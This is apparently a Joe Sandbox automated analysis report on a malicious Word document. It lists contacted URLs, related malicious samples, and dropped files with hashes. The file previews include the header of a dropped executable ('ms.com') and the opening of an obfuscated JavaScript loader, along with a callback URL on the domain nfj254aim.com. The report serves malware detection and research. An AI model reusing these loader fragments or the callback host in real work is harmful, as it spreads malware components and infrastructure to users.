https://outlook.office365.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://incidents.diagnostics.office.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://api.office.net	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://incidents.diagnosticssdf.office.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw	ms.com, 00000001.00000003.224033467.0000000006E03000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://entitlement.diagnostics.office.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://autodiscover-s.outlook.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://templatelogging.office.com/client/log	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://webshell.suite.office.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://management.azure.com/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://ncus-000.contentsync.	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows.net/common/oauth2/authorize	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://devnull.onenote.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://messaging.office.com/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://augloop.office.com/v2	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://skyapi.live.net/Activity/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://dataservice.o365filtering.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://ovisualuiapp.azurewebsites.net/pbiagave/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	Avira URL Cloud: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://directory.services.	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows-ppe.net/common/oauth2/authorize	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://loki.delve.office.com/api/v1/configuration/officewin32/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.28.6.227	unknown	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	326338
Start date:	03.12.2020
Start time:	10:11:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	documenti 12.01.20.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.expl.winDOC@4/13@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 83.9%) Quality average: 70.8% Quality standard deviation: 35%
HCA Information:	Successful, ratio: 57% Number of executed functions: 7 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.109.88.177, 52.109.12.21, 52.109.76.36, 51.104.139.180, 92.122.144.200, 104.43.193.48, 67.27.158.254, 8.248.113.254, 67.26.75.254, 67.27.158.126, 67.27.233.126, 20.54.26.129, 92.122.213.247, 92.122.213.194 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	documenti 12.01.20.doc	Get hash	malicious	Browse	172.67.164.220
	dettare-12.01.2020.doc	Get hash	malicious	Browse	104.24.122.135
	dettare-12.01.2020.doc	Get hash	malicious	Browse	104.24.122.135
	officialdoc!_013_2020.exe	Get hash	malicious	Browse	104.24.126.89
	https://tvronline.com/ihs	Get hash	malicious	Browse	104.16.123.96
	dettare-12.01.2020.doc	Get hash	malicious	Browse	104.24.123.135
	2020-12-03_08-45-45.exe.exe	Get hash	malicious	Browse	104.31.70.85
	STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	162.159.130.233
	invoice.xlsx	Get hash	malicious	Browse	172.67.143.180
	Vlpuoe2JSz.exe	Get hash	malicious	Browse	23.227.38.74
	MxL5EoQS5q.exe	Get hash	malicious	Browse	104.27.146.3
	imVtKjcvlb.exe	Get hash	malicious	Browse	172.67.146.58
	Quote.exe	Get hash	malicious	Browse	172.67.188.154
	doc-3860.xls	Get hash	malicious	Browse	104.31.87.226
	LIST_OF_IDs.xls	Get hash	malicious	Browse	104.22.1.232
	niteEnrgy.xlsx	Get hash	malicious	Browse	162.159.134.233
	Shipment Document BL,INV and packing list.jpg.exe	Get hash	malicious	Browse	23.227.38.74
	info1270.xls	Get hash	malicious	Browse	104.28.11.60
	urXFLGgIxo.xls	Get hash	malicious	Browse	104.22.0.232
	urXFLGgIxo.xls	Get hash	malicious	Browse	172.67.8.238

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\Public\ms.com	dettare-12.01.2020.doc	Get hash	malicious	Browse
	legal paper-12.01.2020.doc	Get hash	malicious	Browse
	statistics,11.20.2020.doc	Get hash	malicious	Browse
	commerce _11.20.2020.doc	Get hash	malicious	Browse
	file-11.20.doc	Get hash	malicious	Browse
	command-11.05.2020.doc	Get hash	malicious	Browse
	official paper_11.20.doc	Get hash	malicious	Browse
	legal agreement 11.20.doc	Get hash	malicious	Browse
	specifics 11.05.2020.doc	Get hash	malicious	Browse
	particulars,11.20.doc	Get hash	malicious	Browse
	enjoin-11.05.2020.doc	Get hash	malicious	Browse
	specifics-11.05.2020.doc	Get hash	malicious	Browse
	intelligence-11.05.2020.doc	Get hash	malicious	Browse
	documents_11.20.doc	Get hash	malicious	Browse
	file.11.20.doc	Get hash	malicious	Browse
	require-11.20.doc	Get hash	malicious	Browse
	require_11.20.doc	Get hash	malicious	Browse
	official paper.11.20.doc	Get hash	malicious	Browse
	order_11.20.doc	Get hash	malicious	Browse
	material-11.20.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\Public\ms.com Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	4.926696656173964
Encrypted:	false
SSDEEP:	192:ohs5YZgW7BXxaQbmpi/Dago+Mz8FDe2WwqrIRbW3oo:9kBXxfmpimR78E2WwqIWYo
MD5:	7083239CE743FDB68DFC933B7308E80A
SHA1:	274216860964AF5ACDCE5F7BD508F69C98FA55B2
SHA-256:	CBAB3546BDDB2E4EA340C1A7DF680DA6C4F4F2F18B8E98F6D4B66926183E269E
SHA-512:	8047FCAB5D3A35A405661C72879D6EBCF3EF2AFE7486649F0BBC43FA59E898A9E37A998940764422E1AB0AE066B3E45132D67CAB963B9BF3C44BC3EC8D4EDC6D
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: dettare-12.01.2020.doc, Detection: malicious, Browse Filename: legal paper-12.01.2020.doc, Detection: malicious, Browse Filename: statistics,11.20.2020.doc, Detection: malicious, Browse Filename: commerce _11.20.2020.doc, Detection: malicious, Browse Filename: file-11.20.doc, Detection: malicious, Browse Filename: command-11.05.2020.doc, Detection: malicious, Browse Filename: official paper_11.20.doc, Detection: malicious, Browse Filename: legal agreement 11.20.doc, Detection: malicious, Browse Filename: specifics 11.05.2020.doc, Detection: malicious, Browse Filename: particulars,11.20.doc, Detection: malicious, Browse Filename: enjoin-11.05.2020.doc, Detection: malicious, Browse Filename: specifics-11.05.2020.doc, Detection: malicious, Browse Filename: intelligence-11.05.2020.doc, Detection: malicious, Browse Filename: documents_11.20.doc, Detection: malicious, Browse Filename: file.11.20.doc, Detection: malicious, Browse Filename: require-11.20.doc, Detection: malicious, Browse Filename: require_11.20.doc, Detection: malicious, Browse Filename: official paper.11.20.doc, Detection: malicious, Browse Filename: order_11.20.doc, Detection: malicious, Browse Filename: material-11.20.doc, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q*A..D...D...D..h....D..tG...D..t@...D...E...D..tE...D..tA...D..tM...D..t....D..tF...D.Rich..D.........PE..L...R........................"...............0....@..................................j....@..................................@..d....P.......................p..........T............................................@...............................text............................... ..`.data........0......................@....idata..F....@......................@..@.rsrc........P......................@..@.reloc.......p.......2..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\ms.html Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	17904
Entropy (8bit):	5.221943493256307
Encrypted:	false
SSDEEP:	192:eBZQiLCb1hint4zdt1e870k0hs70k0C2qNXl6qJExTxvYj0lXUZIeYsa3UKh73uy:e3QYnadWs4TxYI2ZHeM7MQc
MD5:	7F908F1EE0BBB0B276589F06368A008D
SHA1:	EE9D0FA4C45AEB9C75750AA003E7C0F0F22E348D
SHA-256:	8B23A9189FD2FE4CC89459224ED36E7A64121DE9589D3AC9CEAE9E4DEEF7F23A
SHA-512:	3FBEBBCD1B5F2A731470037A702BA58EEFBC0764874D465539E90B6FCD4BA16E93221E8EB402BF2D3B603A6B4D81E3B1A2E68EA3625A93716F4EF991FA625633
Malicious:	false
Reputation:	low
Preview:	<html>..<body>..<script language="javascript">..var a3MQw4 = true;..var a3yaLo = -47909;..function decode(input)..{..var keystr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";..var output = "";..var chr1, chr2, chr3;..var enc1, enc2, enc3, enc4;..var i = 0;..input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");..while (i < input.length)..{..enc1 = keystr.indexOf(input.charAt(i++));..enc2 = keystr.indexOf(input.charAt(i++));..enc3 = keystr.indexOf(input.charAt(i++));..enc4 = keystr.indexOf(input.charAt(i++));..chr1 = (enc1 << 2) \| (enc2 >> 4);..chr2 = ((enc2 & 15) << 4) \| (enc3 >> 2);..chr3 = ((enc3 & 3) << 6) \| enc4;..output = output + String.fromCharCode(chr1);..if(enc3 != 64)..{..output = output + String.fromCharCode(chr2);..}..if(enc4 != 64)..{..output = output + String.fromCharCode(chr3);..}..}..return(output);..}..var aVEqp = true;..var atpoA = "HKEY_CURRENT_USER\\Software\\aHgVT\\auJ5v2";..var a7PjY = "a9IlS";..var a4qgwu = a7PjY.length;..anD3Wb = true;..window

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\03A112E3-5A1A-4EB6-A30A-4E5816B016CD Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	130058
Entropy (8bit):	5.378006827606677
Encrypted:	false
SSDEEP:	1536:6cQceNWrA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:hmQ9DQW+zBX8u
MD5:	F28073F5D9517A703D6F836C06E3BD72
SHA1:	F3D940A80A311EFCD0E05027AEC396B477CD3390
SHA-256:	2BF2B6CB402BBEB2DF6D7C17F4F26FADFF892B82B46848B2A1D07815FFAFC3CF
SHA-512:	093D18E703EB29CC96B81E62CF1C242FB9DDEEFE2011A1853F08A1B25B2BB9C2E9E857BE754DE016C0507A14C904AAC9B8C0952F43C160BD45643BA1769FC5A3
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-12-03T09:12:11">.. Build: 16.0.13601.30534-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D1F0E0D.jpeg Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	[TIFF image data, big-endian, direntries=4, xresolution=62, yresolution=70, resolutionunit=2, software=Paint.NET v3.5.11], baseline, precision 8, 994x241, frames 3
Category:	dropped
Size (bytes):	57258
Entropy (8bit):	7.900983242117529
Encrypted:	false
SSDEEP:	768:Nne7FOQKYij8iCi2EQrb4lF6j5UTFRHehGLOAFed/6CO2wPbttab/jz7Q+6fNsaw:Ne7Il+Oy4wUOAL2wPbnQ/Tz6CaCd
MD5:	B44AC26E80A557B913B715F234C3D769
SHA1:	1E0574649A9E5BBE0283D83A801E0E3EC4261BBC
SHA-256:	1EFAC6DE241D24814D7925C803E3ACBF4E2CD4A90FDE9C6826613DE2A8063B7B
SHA-512:	4349E729AEDC4E69A92432553C0BEA8CF5D4D92E7908F25DB5DF3E1B3628F74D362AFD15AED5EED12E53ABDFFAB44F81E39006C8C6FF4D242A05D45AFFA08E5D
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....hExif..MM..................>...........F.(...........1.........N.......`.......`....Paint.NET v3.5.11....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......C@.9.cJ9.b.....^..e...G..~.vP/...]f...Zh.....1y.7.%R5'v.WE..@..J.N....V....9.e...$a....R..R..{...........).......O.\|<.-bR.>..^.F[$a........... ....r.../.....?.._.....'.7A+.r...3..Yj..o.'o....=)k......?..8.._....K................g....8...e\...e.(...q..1.2.W.3...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{530E58BB-187E-4C19-8B2C-85E6BFE40879}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:X:X
MD5:	32649384730B2D61C9E79D46DE589115
SHA1:	053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
SHA-256:	E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
SHA-512:	A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{68948AFA-45F9-4DB8-A153-5A7DB6FAA966}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	0.3796147056131488
Encrypted:	false
SSDEEP:	3:9l3lli4wltfSP8lFllItEMAWuWy:kFSP8gtEMAWpy
MD5:	39F0255F9BB41BD49E765898D326FB77
SHA1:	8AD67EEB7CF2ED4CA7DD1AF586406DE92113C6F1
SHA-256:	7DB4A7FAFE19900A941F5EC134454C4769D6D1F8227A176A3CEBD9F3C7D86056
SHA-512:	6FD2E6037C25B4EC5D091B9E2C3F2E9EC04FC3A59AFD79D980ED0E11FFEEFBA18EA535B1C0443A01BC50C5AED4C4F1150B0487B89CE35B2B440D323B40592B28
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....../.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{CE8E963C-75E4-48F8-AAD8-BF6FA61F3A31}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\xspcd2[1].htm Download File
Process:	C:\Users\Public\ms.com
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	205
Entropy (8bit):	5.155240244937957
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T
MD5:	6C598B85477C948D2A6C50AB26631415
SHA1:	429CE2C54B01450B0250D423F08886A0F6B567DB
SHA-256:	04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4
SHA-512:	9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA
Malicious:	false
Reputation:	low
IE Cache URL:	http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "xspcd2" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Local\Temp\temp.tmp Download File
Process:	C:\Users\Public\ms.com
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	205
Entropy (8bit):	5.155240244937957
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3RSG8KCezocKqD:J0+oxBeRmR9etdzRxgzez1T
MD5:	6C598B85477C948D2A6C50AB26631415
SHA1:	429CE2C54B01450B0250D423F08886A0F6B567DB
SHA-256:	04F87DABEBF8EF014741C17361A203E1DA743BA43AF231D9B8DC02DEBE9E6FC4
SHA-512:	9C5D564EA1CA2842FB8667C31E8A5CCB07A05073DB509BABF9EA93425B9A344609928582A41CC7DDDAF2A068BF5CBE579F88F8EC8FC3ED4EAC6B796A387C73EA
Malicious:	true
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "xspcd2" was not found on this server.</p>.</body></html>.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documenti 12.01.20.doc.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:44 2020, mtime=Thu Dec 3 17:12:12 2020, atime=Thu Dec 3 17:12:09 2020, length=88302, window=hide
Category:	dropped
Size (bytes):	2190
Entropy (8bit):	4.712055572834122
Encrypted:	false
SSDEEP:	24:8xJvKgz97TLn0AWHlHD+C3S7aB6myxJvKgz97TLn0AWHlHD+C3S7aB6m:8vvKarDWHgC3DB6pvvKarDWHgC3DB6
MD5:	4E46CCE2B28C2C8F37445649C41C3D13
SHA1:	53466F4075B1C2DA347CAC97D9DF3328475AE4AA
SHA-256:	51E4ACCBF645FBA5364F0778E421EB5860A68FC62E0445581E8A622806CCBC7D
SHA-512:	CD886689C52BC3F75ADAE18F4005735E8B3F06C265D862378BDAB418ED36ADE3FA1859DCAD9C26938B52AB170CC4D9B5370135630EE6864A26DF7E20F188E9C8
Malicious:	true
Preview:	L..................F.... ...)...:................X...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Q{.....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny..Q{......S........................h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny..Q\|......Y..............>.....3...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2..X...Q.. .DOCUME~1.DOC..^......>Qwx.Q......h.....................8./.d.o.c.u.m.e.n.t.i. .1.2...0.1...2.0...d.o.c.......\...............-.......[...........>.S......C:\Users\user\Desktop\documenti 12.01.20.doc..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.i. .1.2...0.1...2.0...d.o.c.........:..,.LB.)...As...`.......X.......707748...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.257252520997243
Encrypted:	false
SSDEEP:	3:M18H9LRBa9CZELRBa9CmX18H9LRBa9Cv:M+H9LCgELC2H9LCs
MD5:	E4D38C0BB0C8C137A27C95905AF5428E
SHA1:	8D6D1A7BD1F255BE9B0F781D48887D9FFAC1BE48
SHA-256:	461FC19670225BA840A06E93B71E3170F24C1B0C0362756ADABA3389BD5D31C5
SHA-512:	89E37B3E835960A39E17FFEF53755EFB4309DE3F8F93FBF8A1381A2E1DCC27AB8AAF7F5C902177EBEBFFBB95A0B7D3679DD3853975331DDA6B1D49F36A1C692B
Malicious:	false
Preview:	[doc]..documenti 12.01.20.doc.LNK=0..documenti 12.01.20.doc.LNK=0..[doc]..documenti 12.01.20.doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.270627014481718
Encrypted:	false
SSDEEP:	3:Rl/ZdXmxoYlqKKhlLlFlqKO83X/tln:RtZVmxQ5QO
MD5:	91C0013827A6C6DC8AAAE35D0CD89DC6
SHA1:	118F5DE34C62F8B7A3117BD1BDCCC30DDA804688
SHA-256:	EAE73803990EB17F35470ED74A38A013986DF7D071BF65FECC8E002616A1EFB8
SHA-512:	40A7A76D64B90F0FBFFA5F4C7F84031FF8CD2AE102760E54A6837909D34A6C076EC34E8E06C255590CBF7F5F6E1F1E2A40F2496BB034E5B779EBDAF9462E2113
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h.........#...............T.......6C....../...............$.......6C......+...................

C:\Users\user\Desktop\~$cumenti 12.01.20.doc Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.270627014481718
Encrypted:	false
SSDEEP:	3:Rl/ZdXmxoYlqKKhlLlFlqKO83X/tln:RtZVmxQ5QO
MD5:	91C0013827A6C6DC8AAAE35D0CD89DC6
SHA1:	118F5DE34C62F8B7A3117BD1BDCCC30DDA804688
SHA-256:	EAE73803990EB17F35470ED74A38A013986DF7D071BF65FECC8E002616A1EFB8
SHA-512:	40A7A76D64B90F0FBFFA5F4C7F84031FF8CD2AE102760E54A6837909D34A6C076EC34E8E06C255590CBF7F5F6E1F1E2A40F2496BB034E5B779EBDAF9462E2113
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h.........#...............T.......6C....../...............$.......6C......+...................

Static File Info

General
File type:	Microsoft Word 2007+
